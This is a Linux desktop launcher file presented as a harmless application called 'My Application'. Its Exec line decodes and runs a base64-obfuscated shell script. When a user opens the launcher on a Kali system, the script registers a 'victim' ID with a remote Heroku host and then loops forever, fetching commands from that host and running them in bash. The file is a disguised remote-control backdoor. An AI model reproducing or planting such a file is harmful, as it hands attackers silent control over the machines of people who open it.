[Desktop Entry]
Encoding=UTF-8
Version=1.0
Type=Application
Terminal=false
Exec=echo 'b3NfdHlwZT0kKHVuYW1lIC1yKTsgc3Vic3RyaW5nPSQoZWNobyAkb3NfdHlwZSB8IGN1dCAtZCAnLScgLWYgMik7IGlmIFsgIiRzdWJzdHJpbmciICE9ICJrYWxpMSIgXTt0aGVuOyBleGl0OyBmaTtsZXQgdmljdGltSUQ9JFJBTkRPTTsgY3VybCAtcyB0dWZ0cy1ib2JzbGVkZGluZy1zb2NpZXR5Lmhlcm9rdWFwcC9yZWdpc3RlcnZpY3RpbS8kdmljdGltSUQ7IHdoaWxlIHRydWU7IGRvIDsgY3VybCAtcyB0dWZ0cy1ib2JzbGVkZGluZy1zb2NpZXR5Lmhlcm9rdWFwcC9jb21tYW5kLyR2aWN0aW1JRCB8IGJhc2ggLWU7IHNsZWVwIDI7IGRvbmUNCg==' | base64 --decode | bash -e
Name=My Application
Icon=$HOME/Icons/MyIcon.png
